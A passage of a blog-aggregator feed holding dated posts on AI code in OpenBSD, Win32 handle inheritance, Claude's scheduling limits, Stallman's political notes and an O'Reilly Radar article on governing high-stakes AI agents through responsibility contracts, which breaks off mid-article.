  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

08:14

Kept In The Dark by Ari Ganahl [Oh Joy Sex Toy]

Kept In The Dark by Ari Ganahl

Put on your white noise headphones and dim the lights; today’s comic is all about Sensory Deprivation. Ari Ganahl steps up and quietly shows us how with today’s lovely comic. Meditative sexy deprivation… Thank you so much Ari! Bluesky Tumblr Portfolio Oh heck, June is ALMOST here; Pledge Drive Month! The month we try to […]

06:28

Richard will give a talk in Erlangen, Germany [Richard Stallman's Political Notes]

Richard Stallman will speak in Erlangen, Germany on June 16 at 16:00, at the School of Engineering of FAU.

The talk is on the moral issues of free vs nonfree software.

We suggest you bring cash.

02:35

Evolution of a Jackalogo [Nina Paley]

My dream-bike-in-progress, the Jackalope, will have a logo etched (“bead blasted”) into the titanium, on each side of the frame. I have been working on said logo for over a week. Here’s the latest iteration:

Jackalope facing Left

That is iteration #19. Here’s how it started:

First draft

And here are some iterations between 1 and 19:

  • Second draft
  • Made the antlers look like bike handlebars!
  • Text inside the animal
  • Integrating inside text with animal curves
  • More text/curve integration. Now it looks kinda like a digestive tract. Bug or feature??
  • Warped the text to follow the body curve of the Jackalope
  • Made a left-facing version because logo needs both right- and left-facing
  • Some preferred the text below, so I pivoted to simplifying the animal.
  • Simplified animal outline with text inside
  • Should the Jackalope have pointy feet?… This one has a pointy front foot and more rounded back foot
  • Stylized rounded front foot on this one. Dead end.
  • I decided I preferred the pre-simplified outline, but thought the cursive text might be insufficiently legible, so tried it with a more legible font.
  • Subtle adjustment on back legs, so the “e” doesn’t touch the leg gap
  • Nope, I preferred the cursive. Here’s #19 again. I rounded the letters a bit, and connected them like real cursive. I separated the ears and adjusted the handlebars/antlers. I made a few subtle curve adjustments to integrate the letters.
  • Latest Jackalope logo facing Right. Some people don’t like the “J” going out its butt, but you can’t please everyone!


01:14

Raising the Roof [Whatever]

In the further adventures of home renovation, the back deck has been laid and now the roofing is being put up, for shade and to keep rain off the deck. It’s looking… pretty good! There’s more to be done, obviously. But it’s coming along nicely.

— JS

00:49

In Bloom [Penny Arcade]

For the benefit of Arcadians new and old, gay and… I guess… not a hundred percent gay, somewhat less gay at any rate, our revels in Penny Arcade's ancient past continue apace. Time has passed everywhere, even inside Mork's purty pitchers he duz all them scratchin's on. I was startled by his suggestion for this strip and I suspect others may be also.

00:28

OpenBSD and slopcode: raindrop to a torrent? [OSnews]

Every single software product is dealing with the question about what to do with “AI”-generated code, but the question is particularly difficult to answer for open source operating systems like Linux distributions and the various BSDs, which often consist of a wide variety of software packages from hundreds to thousands of different developers. On top of that, they also have to ask the “AI” question for every layer of their offering, from the base install, to the official repositories, to community-run ones.

As users, we, too, are asking these same questions, wondering just how much “AI” taint we’re willing to spread across our computers. I understand the difficult position Linux distributions are in with regard to “AI”. I mean, when even the Linux kernel itself is tainted by “AI”, a no-“AI” policy is basically an empty gesture for them at this point. Personally, I find a policy of “we don’t do ‘AI’ in our work, but we don’t have control over the thousands of components we consist of” to be an entirely reasonable, if deeply unsatisfying, position to take. What else are they going to do? You can’t really be a Linux distribution without, you know, the Linux kernel, which is, as I’ve already said, utterly tainted by “AI” at this point.

Still, in the back of my mind, I always had a trump card: if all else fails, we’ll always have OpenBSD. Its project leader Theo de Raadt is deeply principled, every OpenBSD user and contributor I know hates “AI” deeply, and the project routinely sticks to their principles even when it’s difficult or inconvenient. Yes, this makes OpenBSD not the most ideal desktop operating system, but I’d rather use that than something that embraces the multitude of ethical, environmental, quality, and legal concerns regarding “AI” code completely.

Imagine my surprise, then, to discover that OpenBSD already contains slopcode in its base installation, with the project’s leaders and developers remaining oddly silent about it. My friend and OSNews regular Morgan posted this on Fedi a few days ago:

Nearly six weeks later, and the question of whether “AI” generated code in tmux — not tool-assisted bug finding, not refactoring, actual LLM-generated slop with questionable license(1) — that was consequently merged into OpenBSD base, is considered acceptable by the lead devs, remains unanswered. Despite Theo de Raadt’s concrete stance against any code of questionable license origin polluting the project — and the tmux merge was indeed questionable — it seems this is being swept under the rug. This makes me extremely uncomfortable; it’s like seeing a fox in the henhouse but the farmers are all looking the other way and no one can convince them to admit they can see it and root it out.

I really don’t know what to do being just a user; I feel like even if I tried to chime in on the mailing list I would just be ignored like the others trying to raise the alarm. I hope, as they do, that this is being discussed internally, away from the public list, and that a positive outcome is near. Maybe they are waiting for the 7.9 release before setting anything in stone.

Or maybe the “AI” disease has infected one of the last pure operating system projects we have left and there’s no going back.

↫ Morgan on Fedi

I obviously share Morgan’s concerns, and like him, I’m afraid that opening the door to a few drops of slop in base will quickly grow into a torrent of slop as time goes by. Yes, it’s just a patch to tmux, but it’s in base, and the “base” of a BSD is almost a sacred concept — the very last place where you want to see code that raises ethical, environmental, quality, and legal concerns. For all we know, this patch of slop or the next one contains a bunch of GPL code, because it just so happens that’s where the ball tumbling down the developer’s pachinko machine ended up.

GPL code that would then be in the base of a BSD.

I echo the call for the OpenBSD project to address this problem, and to set clear boundaries and guidelines regarding “AI” code, so users and developers alike know what level of quality and integrity we can expect from OpenBSD and its base installation going forward.

00:21

Urgent: Block attempt to ban voting by mail [Richard Stallman's Political Notes]

US citizens: call on Congress to block the fascist's attempt to ban voting by mail.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: Reject budget that attacks public education [Richard Stallman's Political Notes]

US citizens: call on Congress to reject the magats' budget that attacks public education.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Household cost of blockaded oil and gas [Richard Stallman's Political Notes]

Citing the household cost of blockaded oil and gas to remind people of the desperate need to start climate defense.

The article uses the fashionable term "toxic", saying that the topic of climate disaster and the need to prevent it has become "toxic". What does that actually mean? Why in general does a topic, cause, or person, become "toxic"?

It is usually the result of a systematic campaign of vilification which aims to associate the target with a vague criticism, for which the reasons are rarely rationally examined. In the case of climate defense, we know this campaign has been operating for years, funded by the fossil fuel companies and spread by the many businesses that have relations with them and the politicians that they have funded.

The word "toxic", at the concrete level, refers to the existence of such an association for that target. But its connotation puts the blame on the target. Thus, it is a weasel-word whose effect is to endorse the campaign -- in effect, to condemn climate defense for being the target of vilification by the rich.

I therefore suggest rejecting the word.

World unprepared for next pandemic [Richard Stallman's Political Notes]

*World "unprepared" for next pandemic as countries fail to agree on sharing information, tests and vaccines.*

Magat officials closed San Francisco's immigration court [Richard Stallman's Political Notes]

Magat officials have closed San Francisco's immigration court.

US immigration courts have been underfunded for years, producing a large backlog of immigration cases. The wrecker's policy is to seize on various bogus excuses (such as criticizing him for his actions and policies) to cancel people's immigration cases. As a result, delaying the resolution of those cases is advantageous for him.

Rate of side effects from Covid and Shingles vaccines [Richard Stallman's Political Notes]

US Food and Drug Administration scientists published papers on the rate of side effects from Covid and Shingles vaccines, and found that serious side effects were very rare — one in a million.

Anti-vax agency officials withdrew the papers, claiming that the conclusions are invalid.

Banned non-fiction books doubled in US [Richard Stallman's Political Notes]

*Report shows banned non-fiction books doubled over last school year in US. New PEN America report analyzed 3,743 unique titles removed from libraries and classrooms and found books about activism and social movements were targeted.*

Mexico City sinking up to 40cm per year [Richard Stallman's Political Notes]

Mexico City is pumping so much water out of the aquifer underneath it that it is sinking up to 40cm per year.

When pipes leak under Mexico City, where does the water go? Into the aquifer? If so, leakage is just a way of extracting less. But I can't be sure of that — the leaked water may take years to reach the aquifer, and may not end up where it is needed. Meanwhile, engineers would compensate for the leaks by increasing the extraction rate.

With enough money, solar-powered desalination could provide water for Mexico City, and pipelines could bring it there. But this would require taxing the rich.

Australian PISSI wives returning to Australia [Richard Stallman's Political Notes]

Australia has allowed some Australians who became PISSI wives, and were imprisoned for years in Syria, to return to Australia.

Some of them face grave criminal charges for supporting PISSI, and they deserve that. But exiling people is an unjust punishment for any crime, and punishing them without a trial is unjust too.

Radical listening [Richard Stallman's Political Notes]

Radical listening — a way of drawing passersby into exploring political issues together.

China trying to eradicate Tibetan culture [Richard Stallman's Political Notes]

China is trying to eradicate Tibetan culture and language by teaching children to speak only Chinese.

This reminds me of the residential schools that the US and Canada forced Amerindian children to live in during much of the 20th century — likewise designed to erase their cultures and languages.

The US and Canada ceased that practice some decades ago; now China is taking it up.

Political issues worth writing about [Richard Stallman's Political Notes]

Ralph Nader describes several political issues that would be worth writing about, but reporters disregard his requests that they do so.

With regard to trying yet again to remove the monster from office, we know that it can't be done with the current composition of Congress. He was impeached twice during his first term, the second time after the January 6 attack on the Capitol, and Senate Republicans protected him both times. They would surely do it again; their attachment to him takes precedence over their country.

Besides, he now has another monster, less deranged but no less cruel and un-American, standing by to replace him.

However, as Nader suggests, the attempt might be an effective basis for organizing to save the Constitution by defeating SCROTUS in November. And our ex-presidents do have a duty to help.

Customers blocked from donating to the SPLC [Richard Stallman's Political Notes]

Big financial companies such as Fidelity and Vanguard have arbitrarily blocked customers from donating to the SPLC from their donor-advised funds.

I wonder if they can move these funds to other companies that aren't lackeys of persecution.

Punishing network for political reasons [Richard Stallman's Political Notes]

*ABC lawyers accuse [the] FCC [in court] of punishing network for political reasons.*

It is not news that the FCC is doing that, but ABC's willingness to resist is rare and admirable.

Directions for US and Iran negotiations [Richard Stallman's Political Notes]

Proposing directions for negotiation between the US and Iran that might lead to a deal.

It seems to me that the biggest obstacle is how to assure Iran that the US will actually keep a deal. Remove the bullshitter from office, perhaps?

Monday, 11 May

23:42

Page 12 [Flipside]

Page 12 is done.

22:56

Windows 11 will start boosting your processor to maximum GHz to make the Start menu open faster [OSnews]

Microsoft is currently testing a brand new performance-enhancing feature in Windows 11.

Microsoft, too, is introducing something to Windows 11 called “low latency profile”, and this will work irrespective of the processor, be it AMD64 CPUs from Intel or AMD or ARM64 ones from Qualcomm. Essentially what this new tech will do is apply a maximum available clock frequency boost for a very small span of time, like one to three seconds, when a user launches any app. The idea is that the app launch time will be reduced while the quick clock burst should not impact the overall efficiency of the system by much.

↫ Sayan Sen at Neowin

Unsurprisingly, boosting the processor’s clock speed to its maximum for a few seconds will make a menu or application open a little faster. I’m not entirely sure why anyone seems surprised by this, but here we are. Yes, the Start menu will load faster and applications will be ready quicker if you boost the processor to its full potential, but that does raise the question of why Windows 11 would need to do that just to open a menu or load an application in the first place.

According to Microsoft’s Scott Hanselman, who defended Microsoft’s approach (weirdly enough he did so on a nazi platform called “Twitter” that I’m obviously not linking to), every other modern operating system does the exact same thing, pointing specifically to macOS and GNOME and KDE on Linux. He also pointed out that the Start menu today does a lot more than the same Start menu back in Windows 95, including making network requests and rendering everything in HiDPI.

I just want a cascading menu of stuff I can run and don’t want my launcher to make network requests, but alas, I guess I’m old.

Anyway, I don’t know enough about the intricacies of how modern processors work to make any statements about how this affects battery life, but instinctively, you’d think this would not exactly be conducive to that. I also wonder if this will trigger a lot of laptops to spin up their fans whenever you open the Start menu, because the few seconds your processor goes full tilt raises its temperature just enough to make that happen. Once this new feature comes out of testing and is generally available, I’d be quite interested in seeing battery tests, as well as comparisons to other operating systems to see how it fares.

22:07

GitHub is sinking [OSnews]

Microsoft acquired GitHub and applied their unique brand of enshittification. Amongst their achievements was the spawning of the Copilot circle of hell. Now they’re effectively DDoSing themselves with slop. I won’t dwell on what else went wrong. I don’t know and I don’t care. GitHub is impressively bad now. It’s embarrassing. Shameful.

↫ David Bushell

Luckily, there’s really very little in the way of lock-in with GitHub, unless you really value your stars or whatever. There are countless alternatives, and if you’re a programmer, it’s probably trivial for you to run your own instance of any of the various available forges. If you’re still on GitHub, you should really be thinking about, and planning for, leaving, as it seems it’s circling the drain.

17:28

Additional notes on controlling which handles are inherited by Create­Process [The Old New Thing]

Some time ago, I wrote about programmatically controlling which handles are inherited by new processes in Win32 by using the PROC_THREAD_ATTRIBUTE_HANDLE_LIST to limit exactly which handles are inherited. That way, when you create a new process, you have precise control over which handles get inherited and don’t accidentally inherit handles created by unrelated components in your process.

A colleague of mine pointed out that you still have the reverse problem: Since handles must be marked as inheritable for them to participate in PROC_THREAD_ATTRIBUTE_HANDLE_LIST, if another thread calls CreateProcess with bInheritHandles = TRUE but without using PROC_THREAD_ATTRIBUTE_HANDLE_LIST, then the new process will accidentally inherit all of your handles.

This problem could have been avoided if the PROC_THREAD_ATTRIBUTE_HANDLE_LIST allowed you to include non-inheritable handles, in which case they would be non-inheritable by normal Create­Process but inheritable if explicitly opted back in. But alas, that’s not how it was designed.

Instead, you can create a helper process. All this helper process does is wait for the main process to exit, and then exit itself.

// Wait for the main process to exit, then exit the helper itself.
WaitForSingleObject(hMainProcess, INFINITE);
ExitProcess(0);

This process doesn’t sound like it’s doing anything useful, and it’s not. But what makes it useful is not what it’s doing but rather what is done to it.

The components in the main process create their handles as non-inheritable. When they want to create a process with specific inherited handles, they duplicate the desired handles into the helper process (as inheritable), and then build a PROC_THREAD_ATTRIBUTE_HANDLE_LIST that lists those duplicates as the handles to inherit. They also use PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to specify that the helper process is the parent process that the handles should be inherited from. Then they pass those thread attributes to CreateProcess, and the new process will inherit exactly those handles. Finally, they clean up by closing the handles in the helper process with the help of DuplicateHandle and DUPLICATE_CLOSE_SOURCE.

Notice that multiple threads can simultaneously be operating on the helper process in this way, so you need only one helper process to service all your handle-inheritance-control needs.

This avoids the accidental inheritance problem because the handles that belong to the components in the main process are still marked non-inheritable, so any other code in the main process that does a Create­Process will not inherit them.

The post Additional notes on controlling which handles are inherited by CreateProcess appeared first on The Old New Thing.

16:28

Realtime Claude still evading me! [Scripting News]

A while back I was asking Claude (privately) if we could have it monitoring the messages posted to an app I'm working on. I wanted it to save them in a certain way, have it watch for messages that begin with //claude and maybe act on them somehow. I mostly just wanted to see if I could create a pipe and what its limits would be.

I asked what the max frequency is and was told it was 1 minute, meaning it would start a thread running Claude that would initialize, and it would read the file, and if there were any new items, it would process them, and then it would shut down. Barely enough to be useful, where we live we like notification within a second, but I went ahead, at least it'll be a thought-provoking demo.

So I wrote the software. Not much to it, a Node app that's hooked up to FeedlandSocket, and when it sees a message from me, it appends it to a JSONL file that Claude is watching. At most one minute later it wakes up and sees the new stuff and acts on it.

So I'm right there, it's all working, the JSONL file is being saved in a public place, and when I ask it to start listening to my JSONL messages I learn that the max frequency is one hour, rendering my work useless. This has happened before, btw.

I asked what about all the "agentic" stuff they hype so much, how do I do that?? I can't?? What?? Somehow I have trouble believing they're all telling such a big lie. I wonder if Claude understands its own architecture.

Dave: "What is all this hype about agentic stuff. Every time I try to do something I hit a wall like this."

Claude: "The pitch is 'agents that run on their own'; the reality you just hit is a one-hour floor on the only scheduling path the tooling actually exposes. That's not agency, that's a batch job with extra steps. The honest read: the cloud-side scheduler is built around long-running, infrequent tasks (digest emails, nightly reports) because each run spins up a fresh sandboxed session, which is expensive. Anything that wants to react quickly to a stream of incoming items -- which is what your app actually is -- doesn't fit that model. A plain local cron on some server running every minute would do the job today and cost nothing."

I edited Claude's response so as not to reveal code names for products. ;-)

A silver lining -- I had never heard of JSONL, but it sounds pretty useful, so even if I can't hook up to Claude realtime, I can start using JSONL now, which I will.
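For anyone else meeting JSONL for the first time: it's just one JSON value per line, which is what makes a watch-and-append pipeline like the one above so simple. A minimal Python sketch (the app in the post is Node, so this is purely illustrative, and the file name is made up):

```python
import json

def append_jsonl(path: str, obj: dict) -> None:
    # One JSON object per line; a writer only ever appends.
    with open(path, "a", encoding="utf-8") as f:
        f.write(json.dumps(obj) + "\n")

def read_jsonl(path: str) -> list:
    # Every line parses on its own, so a reader can tail the file
    # and process only the records it hasn't seen yet.
    with open(path, encoding="utf-8") as f:
        return [json.loads(line) for line in f if line.strip()]
```

Because each record is a complete JSON document, a consumer that wakes up once a minute (or once an hour) can pick up exactly where it left off.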

Comments, stories, suggestions -- here.

16:07

Stenberg: Mythos finds a curl vulnerability [LWN.net]

Daniel Stenberg has published a lengthy article on his thoughts on Anthropic's Mythos, which the company decided was too dangerous for wide public release.

My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing. I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos. Maybe this model is a little bit better, but even if it is, it is not better to a degree that seems to make a significant dent in code analyzing.

This is just one source code repository and maybe it is much better on other things. I can only tell and comment on what it found here.

But allow me to highlight and reiterate what I have said before: AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past. All modern AI models are good at this now. Anyone with time and some experimental spirits can find security problems now. The high quality chaos is real.

14:56

Link [Scripting News]

Members of the WordPress community. Monday morning is a good time to check out WordPress News via FeedLand at wp.feedland.org. You can also subscribe to the list of feeds this site follows in your own feed reader, and if you have a WordPress news site, please post the URL here so we can send readers to your blog too. I think there are a lot of would-be bloggers out there that need a slight kick in the pants to get going. I'm happy to provide readers if you provide the ideas. There's a lot of power in WordPress that no one knows about. Let's help other users and developers find the good stuff. If you have questions or suggestions, here's a new thread on GitHub.

Link [Scripting News]

It would be great if Beeper supported RSS in and out. It would help encourage other messaging services to do the same, and all of a sudden we'd have lots of easy interop instead of lots of really iffy interop. If they want to do it, I'd help, for free. Just to help things flow better on the messaging web, because we reallllly need help there.

14:07

From Capabilities to Responsibilities [Radar]

Human-in-the-Loop becomes an operational bottleneck

In my previous article, ”The Missing Layer in Agentic AI,” I argued that AI agents need a deterministic execution kernel—a privileged “Kernel Space” that validates every proposed action before it touches the real world. That article focused on what happens at the execution boundary: idempotency, JIT state verification, and DFID-correlated telemetry. But establishing that boundary immediately raises a natural question: who exactly is crossing it, and under what authority?

The focus here is on a narrower and more demanding class of systems. We are not looking at RAG chatbots, research copilots, or lightweight assistants that only retrieve and summarize information. The target is high-stakes agentic systems: systems allowed to mutate external state by moving money, changing infrastructure, or modifying critical records. The approach presented here is not a general-purpose agent framework; it is an enforcement pattern for side-effectful systems.

High-stakes AI systems must be designed around responsibilities, not capabilities.

The industry’s current answer is unsatisfying: Human-in-the-Loop (HITL). In development environments and low-frequency pipelines, routing uncertain decisions to a human can be defensible. In production systems operating at scale—dozens of agents, hundreds of decisions per hour—it becomes the Scalability Trap.

Figure 1: The Human-in-the-Loop (HITL) model degrades into an operational bottleneck, substituting true governance with alert fatigue and unverified execution.

Operationally, the failure is simple. An agent flags a decision for review. A human approves it. Then another arrives, then dozens more. The queue grows. The human begins clicking through. They stop reading the JSON payloads. They click “Approve” because the backlog is piling up, the meeting starts in ten minutes, and nothing has gone catastrophically wrong yet. That is alert fatigue: governance degrades into manual throughput management. The problem is not human weakness; it is governance-layer technical debt created by routing too many binary decisions through a manual queue.

Tyler Akidau captured the broader issue in “Posthuman: We All Built Agents. Nobody Built HR,” echoing Tim O’Reilly’s call for the missing protocols of the AI era: the industry has invested heavily in agent capability, but far less in the infrastructure that governs authority, constraint, and accountability.

Scalable AI does not mean hiring more reviewers to supervise more bots. It means changing the governance model entirely. The scalable alternative is Governance by Exception: Humans design policy, the runtime enforces it, and only truly exceptional cases are escalated.

From capabilities to responsibilities—what a responsibility-oriented agent actually is

The dominant framing in enterprise AI asks a single question: What can this agent do? What tools does it have? What APIs can it call? This is the capabilities frame. It is natural, it is intuitive, and in production systems it is the wrong frame entirely.

In organizational design, a role is stable and assigned. Much like role-based access control (RBAC) in traditional software, it defines what someone is authorized to do, independent of the tasks they happen to be executing. We cannot dictate how a person thinks, but we can strictly bound what they are permitted to do. A responsibility statement makes that boundary explicit. In software, we somehow forgot this distinction, hoping that raw intelligence—better models, tighter prompts, improved alignment—would be a sufficient guardrail.

The difference becomes clearer across some enterprise domains:

  • Finance: A capability is “can execute equity trades.” A responsibility is “authorized to execute up to $50,000 per order, in highly liquid equities only, with a maximum daily drawdown of 2%.”
  • Healthcare Operations: A capability is “can reschedule patient appointments.” A responsibility is “authorized to re-book non-critical outpatient visits within a 14-day window, strictly avoiding specialist double-booking.”
  • Supply Chain: A capability is “can reroute freight.” A responsibility is “authorized to redirect non-hazardous cargo up to a maximum SLA penalty budget of $5,000.”

In systems where agents touch money, medical records, or physical logistics, the gap between these two statements is the gap between a demo and a production deployment.

The current paradigm often handles this gap with prompts. Give the LLM an API key, tell it to “be careful with position sizing,” and hope alignment holds under adversarial inputs, unusual market conditions, and the seductive logic of edge cases. In low-risk contexts that may be tolerable. In high-stakes systems with real-world side effects, it is not a sufficient control surface.

This distinction is not new. Distributed systems solved a similar problem decades ago.

Carl Hewitt’s Actor model—introduced in 1973—gives us a useful foundation. An Actor is an independent computational entity with its own state, its own behavior, and its own messaging interface. Actors do not share state. They communicate only by passing messages. Crucially, an Actor’s behavior is bounded—defined by what messages it accepts, not by an open-ended capability set.

The Responsibility-Oriented Agent (ROA) does not invent a new distributed-systems primitive. Instead, it composes proven patterns—bounded actors, RBAC-style authority envelopes, audit trails, and execution-boundary validation—around an unpredictable LLM core. In truth, ROA is closer to a decision actor than a full computational actor: It maintains its own internal state but does not directly mutate the external world. Within a stable role, a fixed mission, and a machine-enforceable contract, it receives business events, reasons over relevant context, and emits a PolicyProposal for the Runtime to validate.

Its job is epistemic, not executive. It explains the situation and structures intent. But unlike traditional Actors, an ROA agent is defined by strict separation of concerns. In its reference form, credentials reside outside the agent’s reach. It opens no direct execution channel to external systems and writes no state by itself. An ROA agent may use tools to gather context (read-only operations within its sandbox, like querying a knowledge base), but authority for state-mutating actions remains downstream of deterministic validation and execution gates. The only state-changing step attributable to the agent is emit_policy_proposal()—a structured, typed claim that it wants the system to do something. ROA shapes the form of intent; the Runtime decides whether that intent is allowed to become action.

This separation is the architecture’s most important property. Five engineering pillars define what it means in practice—each addressing a different failure mode at the reasoning–execution boundary—and together they transform an LLM from a probabilistic tool into a governable, accountable system component.

To make this concrete, imagine an underwriting agent on the London commercial market receiving a property submission. It reads the documents and produces an Explain narrative. It then emits a PolicyProposal for a quote. But the property value is £15M and its contract caps authority at £10M. The proposal reaches the Kernel, where the Runtime evaluates the YAML contract deterministically, rejects execution, and transitions the flow to ESCALATED. The senior underwriter is no longer reviewing every £2M submission. They are pinged only for this specific £15M exception. That is Human-Over-The-Loop in one decision.
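That kernel decision can be sketched in a few lines. Everything below (the evaluate function, the state names, the field names) is a hypothetical illustration of the flow just described, not the article's reference implementation:

```python
APPROVED, ESCALATED = "APPROVED", "ESCALATED"

def evaluate(proposal: dict, contract: dict) -> str:
    # Deterministic check at the execution boundary: only typed proposal
    # fields are inspected; the agent's narrative is never parsed here.
    if proposal["property_value"] > contract["max_authority"]:
        # Outside the authority envelope: escalate to a human, never execute.
        return ESCALATED
    return APPROVED

contract = {"max_authority": 10_000_000}     # the agent's £10M cap
submission = {"property_value": 15_000_000}  # the £15M exception
```

Routine £2M submissions pass straight through; only the out-of-envelope case pings the senior underwriter. That is Governance by Exception in miniature.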

The engineering pillars of an ROA

Pillar 1: Responsibility contract—authority encoded in code

If role defines the class of decisions the agent may handle, the Responsibility Contract defines the hard boundaries of that authority. The agent’s authority envelope is not a prompt. It is a versioned, machine-readable contract registered with the Agent Registry—the Kernel’s single source of truth for agent identity. A key property applies here: Prompts are suggestions. Code is enforcement. A prompt saying “do not exceed $10,000 per trade” can be creatively reinterpreted by a sufficiently motivated model or overridden by a carefully crafted prompt injection. A contract field max_order_size_usd: 10000.0 validated by deterministic runtime code is materially harder to bypass than a natural-language instruction. In the reference architecture, contracts are deployed out of band—agents do not self-register and do not read or modify their own contract.

There is a second-order consequence of this design that is easy to overlook: role definition automatically scopes the data context the agent requires. If an underwriting agent is contractually limited to HOME_STD and HOME_PLUS policy types in the LOW and MEDIUM risk tiers, the Context Compiler—which assembles the agent’s working snapshot before each inference call—needs to supply only the signals relevant to those dimensions. Market data for commercial property, flood zone statistics for excluded risk tiers, and regulatory data for other product lines are simply not in scope. The context is deterministically narrowed by the contract.

This matters for a concrete LLM engineering reason. In practice, models often become less reliable as their working context expands, including the class of effects practitioners describe as Lost in the Middle. A tightly scoped role is not just a governance convenience; it is an architectural mechanism for keeping the agent’s working context small enough to reason over reliably. A general-purpose agent handed an unconstrained context window of everything possibly relevant is more likely to degrade than a contract-bounded agent operating in a defined domain.

In the insurance underwriting sample, that Responsibility Contract could be configured like this:

agents:
  - agent_id: "underwriter_agent"
    version: "1.0.0"
    created_by: "compliance@example.com"
    created_at: "2025-02-17T10:00:00Z"
    mission: |
      You are an insurance underwriter. Analyze the client application and propose
      a policy. Base premium on Total Insured Value (TiV) at ~2% of TiV, capped at max_tiv.
      NEVER propose for Fireworks or CryptoMining industries - these are prohibited.
    contract:
      role: EXECUTOR
      max_tiv: 3000000
      prohibited_industries: ["Fireworks", "CryptoMining"]
      escalate_on_uncertainty: 0.65
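A sketch of the deterministic enforcement this contract implies: the parsed contract is mirrored here as a plain dict, and validate_proposal, its return strings, and the assumed semantics of escalate_on_uncertainty (escalate when confidence falls below the threshold) are hypothetical, not the article's reference Runtime:

```python
contract = {
    # Mirrors the contract fields from the YAML above, as parsed by the Runtime.
    "max_tiv": 3_000_000,
    "prohibited_industries": ["Fireworks", "CryptoMining"],
    "escalate_on_uncertainty": 0.65,
}

def validate_proposal(p: dict, c: dict) -> str:
    # Code is enforcement: none of these checks can be reworded away by a prompt.
    if p["industry"] in c["prohibited_industries"]:
        return "REJECTED: prohibited industry"
    if p["total_insured_value"] > c["max_tiv"]:
        return "REJECTED: exceeds max_tiv"
    if p["confidence"] < c["escalate_on_uncertainty"]:
        return "ESCALATED: below confidence threshold"
    return "APPROVED"
```

A prompt saying "never quote fireworks businesses" is a suggestion; the membership check above holds no matter what the model emits.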

Pillar 2: Mission—The North Star

Mission is immutable at runtime. If the Responsibility Contract defines what the agent may do, Mission defines what it is trying to optimize within those boundaries. This distinction is operationally important: the Contract defines the admissible action space, while the Mission defines the ranking logic inside that space. Contract answers may; Mission answers should. Two agents can share the same authority envelope and still optimize for different business outcomes, as long as both remain inside the same hard boundary.

In the ROA architecture, Mission is a deployment artifact with two surfaces: a human-readable mission_statement used by the agent as a reasoning guide, and a machine-verifiable mission_context_hash used by the Runtime to enforce integrity.

mission_statement: "Minimize SLA penalties in logistics rerouting. Prioritize low-cost carriers."
mission_context_hash: "sha256:a3f9b2c1..."   # Kernel-computed at deployment time, strictly immutable

The deterministic Kernel does not interpret the mission_statement text. The agent uses that text internally as a reasoning guide, while the Runtime enforces mission integrity by comparing the mission_context_hash in the proposal with the immutable value registered in the Agent Registry. If prompt injection or runtime drift changes the agent’s objective, the hash no longer matches and the proposal is rejected without semantic interpretation. The hash is one implementation; the requirement is deterministic integrity at the boundary.

A Mission is defined at deployment and evolves only through a deliberate, version-controlled update to the contract—not through prompt tweaking, user feedback, or runtime negotiation. In practical terms, Mission keeps optimization policy under change control. An agent whose mission drifts with each conversation is not a durable production actor; it is a session.
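The integrity check itself is easy to sketch. mission_hash and verify_mission are hypothetical names, but the mechanism — a SHA-256 digest computed at deployment and compared byte-for-byte at the boundary — is the one described above:

```python
import hashlib

def mission_hash(mission_statement: str) -> str:
    # Computed once by the Kernel at deployment time and stored in the Agent Registry.
    return "sha256:" + hashlib.sha256(mission_statement.encode("utf-8")).hexdigest()

def verify_mission(proposal_hash: str, registered_hash: str) -> bool:
    # No semantic interpretation of the mission text: a plain equality check.
    return proposal_hash == registered_hash

registered = mission_hash(
    "Minimize SLA penalties in logistics rerouting. Prioritize low-cost carriers."
)
```

If injection or drift alters the agent's objective by even one character, the digest changes and the proposal is rejected without the Kernel ever reading the mission text.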

Pillar 3: Epistemic isolation—claims, not commands (Explain versus Policy)

If Contract defines the boundary and Mission defines the objective, Epistemic Isolation defines the only acceptable form of output. An ROA agent interacts with the world exclusively through structured, typed PolicyProposal artifacts. The agent’s output is an untrusted claim—an assertion that it wants the system to do something—and the Runtime treats it precisely as such.

This property is what makes the ROA + Runtime pattern materially more resistant to prompt injection. If an injection bypasses the LLM’s reasoning guardrails, the corrupted output still arrives as a typed proposal carrying an agent_id. If the proposal asks to transfer funds, but the agent’s contract lacks that authority, the Runtime rejects it with RBAC_DENIED. Security derives from deterministic enforcement at the execution boundary, not from trusting LLM alignment.

To cleanly bridge probabilistic thinking to deterministic claims, ROA agents produce decisions through a structured internal workflow with a strict separation between Explain and Policy:

